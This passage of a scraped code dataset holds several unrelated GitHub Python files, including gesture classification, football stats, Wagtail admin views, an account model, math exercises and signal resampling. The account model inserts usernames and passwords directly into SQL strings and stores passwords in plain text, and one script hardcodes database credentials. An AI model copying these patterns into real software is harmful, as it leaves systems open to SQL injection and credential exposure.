(640,480))\n\n\t\t\timage=cv2.resize(frame,(img_rows,img_cols),interpolation=cv2.INTER_AREA)\n\t\t\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\t\t\tself.frames.append(gray)\n\t\t\tif len(self.frames) != 16:\n\t\t\t\treturn self.data\n\n\t\tinput=np.array(self.frames)\n\n\t\tself.frames = []\n\t\t# print(input.shape)\n\t\tX_tr = []\n\t\tX_tr.append(input)\n\t\tX_train= np.array(X_tr)\n\t\t# print(X_train.shape)\n\t\ttrain_set = np.zeros((1, 16, img_cols,img_rows,3))\n\t\ttrain_set[0][:][:][:][:]=X_train[0,:,:,:,:]\n\t\ttrain_set = train_set.astype('float32')\n\t\ttrain_set /=255\n\t\twith session.graph.as_default():\n\t\t\tkeras.backend.set_session(session)\n\t\t\tresult = self.model.predict(train_set)\n\t\tinput=[]\n\n\t\tif mode == 1:\n\t\t\tvideoName = 'stream'\n\n\t\tthreshold = 0\n\n\t\tself.data = {'videoName' : str(videoName), 'segmentNumber' : int(segmentNumber), 'gestures' :[]}\n\t\tfor i in range(len(result[0])):\n\t\t\tif result[0][i] > threshold:\n\t\t\t\tself.data['gestures'].append({'name': self.labels[i], 'probability': int(result[0][i]*100)})\n\n\t\tif mode == 0:\n\t\t\tself.saveResult(self.data, segmentNumber)\n\n\t\treturn self.data\n\n\tdef saveResult(self, data, segmentNumber):\n\t\tvideoName = data['videoName']\n\t\twith io.open('resultFiles/' + str(videoName[0:videoName.index('.')]) + 'Segment' + segmentNumber + 'Result.json', 'w') as outfile:\n\t\t\tjson.dump(data, outfile)\n\n\tdef getFramesSegmenting(self, videoName, duration):\n\t\timg_rows,img_cols=96, 64\n\t\tframes = []\n\t\tvidcap = cv2.VideoCapture('videoFiles/' + str(videoName))\n\t\tsuccess,frame = vidcap.read()\n\n\t\tif not success:\n\t\t\tprint('could not load video')\n\t\twhile success:\n\t\t\tframe = cv2.flip(frame, 3)\n\t\t\tframe = cv2.resize(frame, (640,480))\n\n\t\t\timage=cv2.resize(frame,(img_rows,img_cols),interpolation=cv2.INTER_AREA)\n\t\t\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n\t\t\tframes.append(gray)\n\t\t\tsuccess,frame = vidcap.read()\n\n\t\tself.fps = float(len(frames) / duration)\n\n\t\treturn frames\n\n\tdef segment(self, videoName, duration):\n\t\timg_rows,img_cols=96, 64\n\n\t\tallFrames = self.getFramesSegmenting(videoName, float(duration))\n\n\t\tvalues = np.zeros(len(allFrames))\n\t\tvaluesCounter = np.zeros(len(allFrames))\n\n\t\tfor i in range(len(allFrames)-15):\n\t\t\tself.frames = allFrames[i:i+16]\n\n\t\t\tinput=np.array(self.frames)\n\n\t\t\tself.frames = []\n\t\t\t# print(input.shape)\n\t\t\tX_tr = []\n\t\t\tX_tr.append(input)\n\t\t\tX_train= np.array(X_tr)\n\t\t\t# print(X_train.shape)\n\t\t\ttrain_set = np.zeros((1, 16, img_cols,img_rows,3))\n\t\t\ttrain_set[0][:][:][:][:]=X_train[0,:,:,:,:]\n\t\t\ttrain_set = train_set.astype('float32')\n\t\t\ttrain_set /=255\n\t\t\twith self.graph.as_default():\n\t\t\t\tresult = self.model.predict(train_set)\n\t\t\t\tinput=[]\n\n\t\t\tvalues[i:i+16] += result[0][25]*100\n\t\t\tvaluesCounter[i:i+16] += 1\n\n\t\tdata = {'videoName' : str(videoName), 'videoDuration' : float(duration), 'segments' :[]}\n\n\t\tinSegment = False\n\t\tthreshold = 40\n\t\tstart = 0\n\t\tend = 0\n\t\tfor i in range(len(values)):\n\t\t\tvalues[i] /= valuesCounter[i]\n\t\t\tif i == (len(values) - 1):\n\t\t\t\tif inSegment:\n\t\t\t\t\tend = (i-1) / self.fps\n\t\t\t\t\tdata['segments'].append({'start': start, 'end': end})\n\t\t\t\tbreak\n\t\t\tif not inSegment:\n\t\t\t\tif values[i] <= threshold:\n\t\t\t\t\tinSegment = True\n\t\t\t\t\tstart = i / self.fps\n\t\t\telse:\n\t\t\t\tif values[i] > threshold:\n\t\t\t\t\tinSegment = False\n\t\t\t\t\tend = 
(i-1) / self.fps\n\t\t\t\t\tdata['segments'].append({'start': start, 'end': end})\n\n\t\tif len(data['segments']) == 0:\n\t\t\tdata['segments'].append({'start': 0, 'end': duration})\n\n\t\tprint(values)\n\t\tself.saveSegments(data)\n\n\tdef saveSegments(self, data):\n\t\tvideoName = data['videoName']\n\t\twith io.open('segmentFiles/' + str(videoName[0:videoName.index('.')]) + 'Segments.json', 'w') as outfile:\n\t\t\tjson.dump(data, outfile)\n","repo_name":"polypheny/Query-by-Gesture","sub_path":"Deepmime/API/Gesture-Recognition-with-3DRESNET/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":6094,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"7539840798","text":"#!/usr/bin/python3\nimport logging\nimport pymysql\nfrom players import Player\n\nseason = '1617'\ndb = pymysql.connect (host=\"localhost\",\n user=\"player\",\n passwd=\"Tykes\",\n db=\"soccer\",\n autocommit = True\n )\n \nsky_team_names = {'Sheffield United':'SHEUTD','Manchester City':'MANCIT',\n 'Manchester United':'MANUTD','Oxford United':'OXFUTD','Leicester City':'LEICES',\n 'Stoke City':'STOKE','Tottenham Hotspur':'TOTTEN', 'West Bromwich Albion':'WESBRO',\n 'West Ham United':'WESHAM','Birmingham City':'BIRMIN','Blackburn Rovers':\n 'BLACKB','Burton Albion':'BURTON','Cardiff City':'CARDIF', 'Derby County':'DERBY',\n 'Huddersfield Town':'HUDDER','Ipswich Town':'IPSWIC','Leeds United':'LEEDS',\n 'Newcastle United':'NEWCAS','Norwich City':'NORWIC','Preston North End':'PRESTO',\n 'Queens Park Rangers':'QPR','Rotherham United':'ROTHER','Wigan Athletic':'WIGAN',\n 'AFC Wimbledon':'WIMBLE','Bolton Wanderers':'BOLTON','Bradford City':'BRADFO',\n 'Charlton Athletic':'CHARLT','Coventry City':'COVENT','Fleetwood Town':'FLEETW',\n 'Milton Keynes Dons':'MK DON','Northampton Town':'NORTHA','Oldham Athletic':'OLDHAM',\n 'Peterborough United':'PETERB','Scunthorpe United':'SCUNTH','Shrewsbury Town':'SHREWS',\n 'Southend United':'SOUTHE','Swindon Town':'SWINDO','Accrington Stanley':'ACCRIN',\n 'Barnet FC':'BARNET','Cambridge United':'CAMBRI','Carlisle United':'CARLIS',\n 'Cheltenham Town':'CHELTE','Colchester United':'COLCHE','Crawley Town':'CRAWLE',\n 'Crewe Alexandra':'CREWE','Exeter City':'EXETER','Grimsby Town':'GRIMSB',\n 'Hartlepool United':'HARTLE','Luton Town':'LUTON','Newport County':'NEWPOR',\n 'Plymouth Argyle':'PLYMOU','Wycombe Wanderers':'WYCOMB','Nottingham Forest':'NOTFOR',\n 'Notts County':'NOTCOU','Sheffield Wednesday':'SHEWED'}\n\ndef openDatabase():\n logging.debug('openDatabase')\n return db.cursor()\n\ndef readTeamNames(cur):\n logging.debug('readTeamName')\n cur.execute(\"Select * from TeamNames\")\n for row in cur.fetchall():\n print (row)\n \ndef findTeamCode(cur,team):\n logging.debug('findTeamCode for: ' + team)\n \n if team in sky_team_names:\n return sky_team_names[team]\n \n sql = \"SELECT `Code` FROM `TeamNames` where `Description` = %s\" \n try:\n cur.execute(sql, team)\n results = cur.fetchone()\n except pymysql.InternalError as error:\n logging.debug('findTeamCode Team ' + str(team) + error)\n \n return results[0]\n \ndef getFormations(cur, team):\n \n sql = \"SELECT `Formation`,`Opposition` FROM `MatchDaySquad` WHERE `Team` = %s\"\n try:\n cur.execute(sql, team)\n formation = cur.fetchall()\n except pymysql.InternalError as error:\n logging.debug('getFormations SQL failed for: ' + team + error)\n \n return formation\n \ndef getHomeResultsData(cur ,team, opposition):\n \n sql = \"SELECT `Score`,`result`, `date`, 'H' FROM 
`Results` WHERE `homeCode` = %s \\\n AND `awayCode` = %s\"\n try:\n cur.execute(sql, (team, opposition))\n results = cur.fetchall()\n except pymysql.InternalError as error:\n logging.debug('getHomeResultsData SQL failed for home: ' + team + error)\n \n return results\n \ndef getAwayResultsData(cur ,team, opposition):\n \n sql = \"SELECT `Score`,`result`, `date`, 'A' FROM `Results` WHERE `homeCode` = %s \\\n AND `awayCode` = %s\"\n try:\n cur.execute(sql, (opposition, team))\n results = cur.fetchall()\n except pymysql.InternalError as error:\n logging.debug('getAwayResultsData SQL failed for away: ' + team + error)\n \n return results\n \ndef getHomeStatsData(cur ,team):\n\n sql = \"SELECT `homeGoals`,`homePossession`, `homeShots`, `homeShotsOnTarget`,`homeCorners` \\\n ,`homeFouls` ,`awayTeam` FROM `Stats` where `homeTeam` = %s\"\n try:\n cur.execute(sql, team)\n results = cur.fetchall()\n except pymysql.InternalError as error:\n logging.debug('getHomeStatsData SQL failed for home: ' + team + error)\n \n return results\n \ndef getAwayStatsData(cur ,team):\n \n sql = \"SELECT `awayGoals`,`awayPossession`, `awayShots`, `awayShotsOnTarget`,`awayCorners` \\\n ,`awayFouls` ,`homeTeam` FROM `Stats` where `awayTeam` = %s\"\n try:\n cur.execute(sql, (team))\n results = cur.fetchall()\n except pymysql.InternalError as error:\n logging.debug('getAwayStatsData SQL failed for away: ' + team + error)\n \n return results\n \ndef closeDatabase(cur): \n logging.debug('closeDatabase')\n db.close()\n \nlogging.basicConfig(level = logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')\nlogging.debug('Start of program')\n \ncursor = openDatabase()\n \nteamFormation = getFormations(cursor, \"BARNSL\")\nprint(teamFormation[1][1])\nteamStats = getHomeStatsData(cursor, \"BARNSL\")\nprint(teamStats[1])","repo_name":"nicebeever/Football-Stats","sub_path":"footballTeam.py","file_name":"footballTeam.py","file_ext":"py","file_size_in_byte":5245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73007191639","text":"from django.contrib.auth.models import Permission\nfrom wagtail.admin.forms.collections import collection_member_permission_formset_factory\nfrom wagtail.contrib.modeladmin.options import ModelAdmin\nfrom wagtail.contrib.modeladmin.views import \\\n CreateView as CreateViewModelAdmin, EditView as EditViewModelAdmin, IndexView as IndexViewModelAdmin\nfrom django.utils.translation import gettext as _\nfrom wagtail.core import hooks\nfrom wagtail.core.models import Collection\n\nfrom collectionmodeladmin.permissions import CollectionPermissionHelper\n\n\nclass IndexView(IndexViewModelAdmin):\n def get_queryset(self, request=None):\n user = self.request.user\n collections = self.permission_helper.permission_policy._collections_with_perm(user, ['add', 'change', 'delete'])\n if 'collection_id' in self.params and self.params.get('collection_id') == '':\n del self.params['collection_id']\n return super().get_queryset(request).filter(collection__in=collections)\n\n def get_context_data(self, **kwargs):\n user = self.request.user\n if user.is_active and user.is_authenticated and user.is_superuser:\n collections = Collection.objects.all()\n else:\n collections = self.permission_helper.permission_policy._collections_with_perm(user, ['add', 'change', 'delete'])\n\n context = {\n 'collections': collections\n }\n if 'collection_id' in self.params:\n current_collection =
Collection.objects.get(id=self.params.get('collection_id'))\n context.update({'current_collection': current_collection})\n\n context.update(kwargs)\n\n return super().get_context_data(**context)\n\n\nclass CreateView(CreateViewModelAdmin):\n\n def get_form_class(self):\n form_class = super().get_form_class()\n user = self.request.user\n\n # If user is superuser then return form_class as is\n # Else filter the collections\n if user.is_active and user.is_authenticated and user.is_superuser:\n return form_class\n else:\n collections = self.permission_helper.permission_policy._collections_with_perm(user, ['add', 'change', 'delete'])\n form_class.base_fields['collection'].queryset = collections\n form_class.base_fields['collection'].choices.queryset = collections\n return form_class\n\n\nclass EditView(EditViewModelAdmin):\n\n def get_form_class(self):\n form_class = super().get_form_class()\n user = self.request.user\n\n # If user is superuser then return form_class as is\n # Else filter the collections\n if user.is_active and user.is_authenticated and user.is_superuser:\n return form_class\n else:\n collections = self.permission_helper.permission_policy._collections_with_perm(user, ['add', 'change', 'delete'])\n form_class.base_fields['collection'].queryset = collections\n form_class.base_fields['collection'].choices.queryset = collections\n return form_class\n\n\nclass CollectionModelAdmin(ModelAdmin):\n index_view_class = IndexView\n create_view_class = CreateView\n edit_view_class = EditView\n permission_helper_class = CollectionPermissionHelper\n index_template_name = 'collectionmodeladmin/index.html'\n\n def get_permissions_for_registration(self):\n return Permission.objects.none()\n\n\ndef collection_modeladmin_register(modeladmin_class):\n \"\"\"\n Method for registering CollectionModelAdmin or CollectionModelAdminGroup classes with Wagtail.\n \"\"\"\n instance = modeladmin_class()\n instance.register_with_wagtail()\n\n @hooks.register('register_group_permission_panel')\n def register_collection_model_permissions_panel():\n return collection_member_permission_formset_factory(\n modeladmin_class.model,\n [\n ('add_%s' % modeladmin_class.model._meta.model_name, _(\"Add\"), _(\"Add/edit %s you own\" % modeladmin_class.model._meta.verbose_name)),\n ('change_%s' % modeladmin_class.model._meta.model_name, _(\"Edit\"), _(\"Edit any %s\" % modeladmin_class.model._meta.verbose_name)),\n ],\n \"collectionmodeladmin/permissions/includes/collectionmodel_permissions_formset.html\"\n )\n\n return modeladmin_class\n","repo_name":"BabisK/wagtail-collectionmodeladmin","sub_path":"collectionmodeladmin/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"1276186638","text":"from mysql.connector import errorcode\nfrom utils.mysql import Mysql\nfrom model.model_base import ModelBase\n\n\nclass AccountModel(ModelBase):\n\n # Get a user's unique ID by username.\n def find_id(self, user):\n db = self.get_db()\n hashid = self.gen_hashid(user)\n\n # Find user=id map from reversed finding table.\n query = f\"\"\"\n SELECT\n `userpair` \n FROM \n `find_user_id` \n WHERE \n `hashid`={hashid}\n \"\"\"\n row = db.fetchone(query, True)\n if not row:\n return 0\n\n userpair = row['userpair'].split(';')\n id = 0\n for pair in userpair:\n if pair == '':\n continue\n\n nameid = pair.split('=')\n # Found.query = f\"SHOW TABLES\"\n # row = db.fetchone(query, True)\n if nameid[0] ==
user:\n id = nameid[1]\n break\n\n return int(id)\n\n # Get a user's username by id.\n def get_user(self, id):\n db = self.get_db()\n\n table_name = self.get_account_table_name(id)\n query = f\"\"\"\n SELECT\n `user`\n FROM\n `{table_name}`\n WHERE\n `id`={id}\n \"\"\"\n row = db.fetchone(query)\n if not row:\n return False\n\n return row['user']\n\n # Get a user's password by id.\n def get_pwd(self, id):\n db = self.get_db()\n\n table_name = self.get_account_table_name(id)\n query = f\"\"\"\n SELECT\n `pwd`\n FROM\n `{table_name}`\n WHERE\n `id`={id}\n \"\"\"\n row = db.fetchone(query)\n if not row:\n return False\n\n return row['pwd']\n\n # Register a new user.\n def reg_user(self, user, pwd=''):\n db = self.get_db()\n\n table_name = ''\n idx = 0\n # Get current table name.\n for i in range(self.config.db_account_cur_table, self.config.db_account_max_table):\n idx = i\n table_name = f\"account{i+1:03}\"\n query = f\"\"\"\n SELECT\n max(`id`) as maxid\n FROM\n `{table_name}`\n \"\"\"\n row = db.fetchone(query)\n if not row or not row['maxid']:\n break\n count = int(row['maxid']) - i * self.config.db_account_per_table\n if count < self.config.db_account_per_table:\n break\n\n # Insert a new account item.\n query = f\"\"\"\n INSERT INTO `{table_name}`\n (`user`,`pwd`,`time`)\n VALUES\n ('{user}','{pwd}',{self.get_nowtime()})\n \"\"\"\n if not db.execute(query, True, True):\n # Insert failed.\n if db.last_errno != errorcode.ER_NO_SUCH_TABLE:\n return 0\n\n # Calculate auto_increment value.\n auto_increment = 10001\n if idx > 0:\n auto_increment = idx * self.config.db_account_per_table + 1\n\n # Create a new table.\n if not self.create_account_table(table_name, auto_increment):\n return 0\n if not db.execute(query, need_rowid=True):\n return 0\n\n id = db.last_rowid\n\n # Generate reversed finding info.\n hashid = self.gen_hashid(user)\n\n # Find user=id map from reversed finding table.\n query = f\"\"\"\n SELECT\n `userpair`\n FROM\n `find_user_id`\n WHERE\n `hashid`={hashid}\n \"\"\"\n row = db.fetchone(query, True)\n if row == False:\n if db.last_errno != errorcode.ER_NO_SUCH_TABLE:\n return 0\n # Try to create a new table.\n if not self.create_finduserid_table():\n return 0\n row = None\n\n if row is None: # hashid does not exist.\n userpair = f\"{user}={id};\"\n query = f\"\"\"\n INSERT INTO `find_user_id`\n (`hashid`,`userpair`)\n VALUES\n ({hashid},'{userpair}')\n \"\"\"\n if not db.execute(query):\n return 0\n else: # hashid exists.\n userpair = f\"{row['userpair']}{user}={id};\"\n query = f\"\"\"\n UPDATE\n `find_user_id`\n SET\n `userpair`='{userpair}'\n WHERE\n `hashid`={hashid}\n \"\"\"\n if not db.execute(query):\n return 0\n\n return int(id)\n\n # Create the 'accountXXX' table.\n def create_account_table(self, table_name, auto_increment=10001):\n db = self.get_db()\n query = f\"\"\"\n CREATE TABLE IF NOT EXISTS `{table_name}`(\n `id` INT NOT NULL AUTO_INCREMENT,\n `user` VARCHAR(255) NOT NULL,\n `pwd` VARCHAR(255) NOT NULL,\n `time` BIGINT NOT NULL,\n PRIMARY KEY(`id`),\n UNIQUE KEY(`user`)) AUTO_INCREMENT={auto_increment}\n \"\"\"\n return db.execute(query)\n\n # Create the 'find_user_id' table.\n def create_finduserid_table(self):\n db = self.get_db()\n query = f\"\"\"\n CREATE TABLE IF NOT EXISTS `find_user_id`(\n `hashid` INT NOT NULL,\n `userpair` TEXT NOT NULL,\n PRIMARY KEY(`hashid`))\n \"\"\"\n return db.execute(query)\n\n def get_account_table_name(self, id):\n # Hash to different table according to id.\n hashid = int(id / self.config.db_account_per_table + 1)\n return 
f\"account{hashid:03}\"\n\n def get_db(self):\n if 'account' not in self.cmd.db_cache:\n self.cmd.db_cache['account'] = Mysql(\n self.app,\n self.config.get_db_host('account'),\n self.config.get_db_port('account'),\n self.config.get_db_user('account'),\n self.config.get_db_pwd('account'),\n self.config.get_db_name('account'),\n )\n return self.cmd.db_cache['account']\n","repo_name":"py499372727/AgentSims","sub_path":"model/AccountModel.py","file_name":"AccountModel.py","file_ext":"py","file_size_in_byte":6265,"program_lang":"python","lang":"en","doc_type":"code","stars":574,"dataset":"github-code","pt":"85"} +{"seq_id":"69890400278","text":"\"\"\"\r\nWe shall say that an n-digit number is pandigital if it makes use of all the digits 1 to n exactly once. For example, 2143 is a 4-digit pandigital and is also prime.\r\n\r\nWhat is the largest n-digit pandigital prime that exists?\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\n\r\n\r\ndef is_pandigital(number: int):\r\n number = str(number)\r\n return set(number) == set(str(i + 1) for i in range(len(number)))\r\n\r\n\r\ndef is_prime(number: int):\r\n if number < 2:\r\n return False\r\n for i in range(2, int(sqrt(number)) + 1):\r\n if number % i == 0:\r\n return False\r\n return True\r\n\r\n\r\n# every 9 digit and 8 digit pandigital number is divisible by 3.\r\nfor number in range(10000000, 0, -1):\r\n if is_pandigital(number) and is_prime(number):\r\n print(number)\r\n break\r\n","repo_name":"Siddhesh-Agarwal/Project-Euler","sub_path":"Project-Euler/Problem_041-050/Problem_041.py","file_name":"Problem_041.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"5522362322","text":"def fibonacci():\n n = int(input(print(\"Which Fibonacci number do you want? \")))\n a = 0\n b = 1\n d = 47\n e = 46\n if n < d:\n for i in range(1, n):\n c = a\n a = b\n if i != e:\n b = b + c\n else:\n break\n n = str(n)\n b = str(b)\n\n print(\"Fibonacci # \" + n + \" is \" + b)\n else:\n print(\"ERROR: Answer does not fit in 32 bits\")\n\nfibonacci()","repo_name":"GameCzar485/Portfolio","sub_path":"IT310 - Data Structures & Algorithms/IT310/Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15224433745","text":"import sys\nimport os\nimport math\nfrom os.path import join, dirname, isfile, abspath\nimport numpy as np\nfrom scipy.stats import t\nimport pandas as pd\nsys.path.insert(1, join(dirname(dirname(abspath(__file__))), 'utils'))\nfrom saving import save, clean_name\n\n\nN_DIMS = 6\nNOISE_STD = 0.1\n\n\ndef evaluate_hartmann6(X):\n try:\n X = np.array([X]).reshape(1, N_DIMS)\n except:\n raise ValueError(\n f'Did not provide the right format for X. 
Should be shape (1, {N_DIMS}) or ({N_DIMS}, ), got {X.shape}')\n\n def hartmann6_func(X):\n i = 0\n alpha = np.array([1.0, 1.2, 3.0, 3.2])\n A = np.array([[10, 3, 17, 3.5, 1.7, 8],\n [0.05, 10, 17, 0.1, 8, 14],\n [3, 3.5, 1.7, 10, 17, 8],\n [17, 8, 0.05, 10, 0.1, 14]])\n P = 1e-4 * np.array([[1312, 1696, 5569, 124, 8283, 5886],\n [2329, 4135, 8307, 3736, 1004, 9991],\n [2348, 1451, 3522, 2883, 3047, 6650],\n [4047, 8828, 8732, 5743, 1091, 381]])\n\n outer = 0\n for ii in range(4):\n inner = 0\n for jj in range(6):\n xj = X[i, jj]\n Aij = A[ii, jj]\n Pij = P[ii, jj]\n inner = inner + Aij*(xj-Pij)**2\n\n new = alpha[ii] * np.exp(-inner)\n outer = outer + new\n\n return np.array([outer])\n\n res = hartmann6_func(X)\n noisy_res = res + np.random.normal(0, NOISE_STD)\n\n return res[0], noisy_res[0]\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) > N_DIMS + 3:\n raise IndexError(\n f'Too many arguments for the {N_DIMS}-dimensional benchmark')\n\n elif len(sys.argv) < N_DIMS + 3:\n raise IndexError(f'Too few arguments for the {N_DIMS}-dimensional benchmark')\n\n method = sys.argv[1]\n run_idx = sys.argv[2]\n if 'run_' not in run_idx:\n raise ValueError(\n 'Run index does not have the proper signature. Should follow the structure run_*index*.')\n\n idx = int(run_idx.replace('run_', ''))\n X = [float(arg) for arg in sys.argv[3:]]\n\n res, noisy_res = evaluate_hartmann6(X)\n save(X, noisy_res, res, clean_name(__file__), method, run_idx)\n\n sys.stdout.write(str(noisy_res) + '\\n')\n","repo_name":"hvarfner/JointEntropySearch","sub_path":"experiments/synthetic/hartmann6.py","file_name":"hartmann6.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"42712798681","text":"from files import *\nfrom obo_parser import *\n\nimport re\n\nclass GoLoader:\n\n\n @staticmethod\n def get_data():\n path = \"tmp\";\n S3File(\"mod-datadumps/data\", \"go.obo\", path).download()\n parsed_line = parseGOOBO(path + \"/go.obo\")\n dict_to_return = {}\n for line in parsed_line: # Convert parsed obo term into a schema-friendly AGR dictionary.\n go_id = line['id']\n dict_to_return[go_id] = {\n 'go_genes': [],\n 'go_species': [],\n 'name': line['name'],\n 'description': line['def'],\n 'go_type': line['namespace'],\n 'go_synonyms': line.get('synonym'),\n 'name_key': line['name'],\n 'id': go_id,\n 'href': 'http://amigo.geneontology.org/amigo/term/' + line['id'],\n 'category': 'go'\n }\n\n return dict_to_return\n","repo_name":"alliance-genome/agr_archive_initial_prototype","sub_path":"indexer/src/loaders/go_loader.py","file_name":"go_loader.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"22860813982","text":"import numpy as np\nprint(\"0\")\nimport pyqtgraph as pg\nprint(\"1\")\nfrom low_pass_filter import low_pass_filter2, createPlot\nprint(\"2\")\n\nn_data = 1000\ncut_freq = 80\naccuracy = 0.005\n\n\ndef oversampling_FFT(signal, n, m): #n - начальное m - конечное число отсчетов\n fft = np.fft.fft(signal)\n furie = np.zeros(m, dtype = complex)\n for i in range(n):\n furie[i] = fft[i]\n if(n%2) :\n half_n = int((n +1) / 2)\n for i in range (half_n+m-n+1,m ):\n furie[i] = furie[i-m+n]\n for i in range (half_n, half_n+m-n ):\n furie[i] = 0\n else:\n half_n = int(n/2)\n for i in range (half_n+m-n+2,m ):\n furie[i] = furie[i-m+n]\n furie[half_n+m-n+1] = furie[half_n+1]/2\n furie[half_n + 1] = furie[half_n+1]/2\n for i in 
range (half_n + 2, half_n+m-n ):\n furie[i] = 0\n res = np.fft.ifft(furie)\n res = res.real\n res = res * m/n\n return res\n\ndef decimation (signal, n, m): #n - начальное m - во сколько раз уменьшаем\n cut = int(n/m/2)\n data = low_pass_filter2(signal, cut)\n #data = low_freq_filter(signal, cut)\n res = np.zeros(int(n/m))\n j=0\n for i in range(0,n-m+1, m):\n res[j] = data[i]\n j+=1\n return res\n\ndef samplerating(signal, n, k=1, m=1): #n - начальное m - во сколько раз уменьшаем k - во сколько увеличиваем\n if(k/m>1):\n res = oversampling_FFT(signal, n, int(n*k/m))\n return res\n else:\n res = oversampling_FFT(signal, n, int(n*k))\n print(res.size)\n res = decimation(res, n*k, m)\n return res\n\nx = np.random.rand(n_data)\nfor i in range (n_data):\n x[i] += 10*np.sin(i/50)+5*np.sin(i*2)\n\n\n\nres = oversampling_FFT(x, n_data, n_data*2)\nres2 = decimation(x, n_data, 3)\nres3 = samplerating(x, n_data, 4, 1)\n\n\n\nx_ = [i for i in range(n_data)]\nx1 = [i for i in range(2 * n_data)]\nx2 = [i for i in range(n_data // 3)]\nx4 = [i for i in range(4 * n_data)]\n\ncreatePlot(x_, x, Name = \"original\")\ncreatePlot(x_, np.abs(np.fft.fft(x)), Name = \"1000\")\ncreatePlot(x1, np.abs(np.fft.fft(res)), Name=\"2000\")\ncreatePlot(x2, np.abs(np.fft.fft(res2)), Name=\"333\")\ncreatePlot(x4, np.abs(np.fft.fft(res3)), Name=\"4000\")\n\n\nif __name__ == '__main__':\n import sys\n if sys.flags.interactive != 1 or not hasattr(pg.QtCore, 'PYQT_VERSION'):\n pg.QtGui.QApplication.exec_()\n\n'''\naxes[0,0].plot(x)\naxes[1,0].plot(np.abs(np.fft.fft(x)))\n\n\naxes[0,1].plot(res)\naxes[1,1].plot(np.abs(np.fft.fft(res)))\n\naxes[0,2].plot(res2)\naxes[1,2].plot(np.abs(np.fft.fft(res2)))\n\naxes[0,3].plot(res3)\naxes[1,3].plot(np.abs(np.fft.fft(res3)))\n\nplt.show()\n\n\naxis = np.linspace(0, n_data, num = res3.size)\nplt.plot(axis, res3, 'bo')\nplt.plot(x, 'ro')\nplt.show()\n'''\n","repo_name":"mikhail-7975/Methods_Of_Signal_Processing","sub_path":"oversampling.py","file_name":"oversampling.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"46762577","text":"import os.path\r\n\r\nimport PyQt6.QtCore\r\nfrom PyQt6.QtGui import QPixmap\r\nfrom PyQt6.QtWidgets import QWidget, QGridLayout, QSpacerItem, QLabel, QVBoxLayout, QHBoxLayout\r\n\r\nfrom components.about_us_picture import AboutUsPicture\r\nfrom components.heading_label import HeadingLabel\r\nfrom components.paragraph_label import ParagraphLabel\r\n\r\n\r\nclass AboutUs(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n self.heading = HeadingLabel(\"About Us\")\r\n\r\n self.layout = QVBoxLayout(self)\r\n self.layout.setSpacing(16)\r\n self.layout.addWidget(self.heading)\r\n\r\n people = [\r\n (\"images:marie.jpg\",\r\n \"Marie Hessefort: I am an Electrical Engineering major at the University of Minnesota with a focus in Biomedical Engineering, Circuit Design, and Digital Signal Processing. 
\"),\r\n (\"images:henry.jpg\",\r\n \"Henry Hein: I am a Computer Engineering major at the University of Minnesota with a focus in Firmware and Digital Logic Design\"),\r\n (\r\n \"images:michael.jpg\",\r\n \"Michael Johnson: I am a Computer Engineering major at the University of Minnesota.\"),\r\n (\"images:jacob.jpg\",\r\n \"Jacob Medchill: I am a Computer Engineering major at the University of Minnesota with a focus on embedded systems.\"),\r\n (\"images:garrett.png\",\r\n \"Garrett Udstrand: I am a Computer Engineering major at the University of Minnesota with a focus in Application Development and AI.\"),\r\n (\"images:Sobelman.jpg\",\r\n \"Gerald Sobelman: Project Sponsor and Professor, Department of Electrical and Computer Engineering. Learn more about my research at: https://cse.umn.edu/ece/gerald-sobelman\")\r\n ]\r\n\r\n self.layout.addWidget(ParagraphLabel(\r\n \"We created this application to allow users of all levels to improve their knowledge of ECGs and their ability to read an ECG strip and Identify different arrhythmias.\"))\r\n\r\n for image, name, in people:\r\n horizontal_layout = QHBoxLayout()\r\n horizontal_layout.setSpacing(30)\r\n horizontal_layout.addWidget(AboutUsPicture(image))\r\n horizontal_layout.addWidget(ParagraphLabel(name))\r\n self.layout.addLayout(horizontal_layout)\r\n\r\n self.layout.addSpacerItem(QSpacerItem(1, 1, PyQt6.QtWidgets.QSizePolicy.Policy.Expanding,\r\n PyQt6.QtWidgets.QSizePolicy.Policy.Expanding))\r\n","repo_name":"GarrettU27/ETTP","sub_path":"pages/about_us.py","file_name":"about_us.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18755131539","text":"import json\nimport datetime\nimport pickle\nimport os\n\nhierarchy = [\n {\n \"id\": 0,\n \"name\": \"Marketing\",\n \"empNumber\": 0,\n \"salaryRate\": {\n \"entry\": 1,\n \"jr\": 2,\n \"sr\": 3,\n \"leader\": 4,\n \"manager\": 5,\n }\n },\n {\n \"id\": 1,\n \"name\": \"IT\",\n \"empNumber\": 0,\n \"salaryRate\": {\n \"entry\": 1,\n \"jr\": 2,\n \"sr\": 3,\n \"leader\": 4,\n \"manager\": 5,\n }\n },\n {\n \"id\": 2,\n \"name\": \"Finance\",\n \"empNumber\": 0,\n \"salaryRate\": {\n \"entry\": 1,\n \"jr\": 2,\n \"sr\": 3,\n \"leader\": 4,\n \"manager\": 5,\n }\n }, {\n 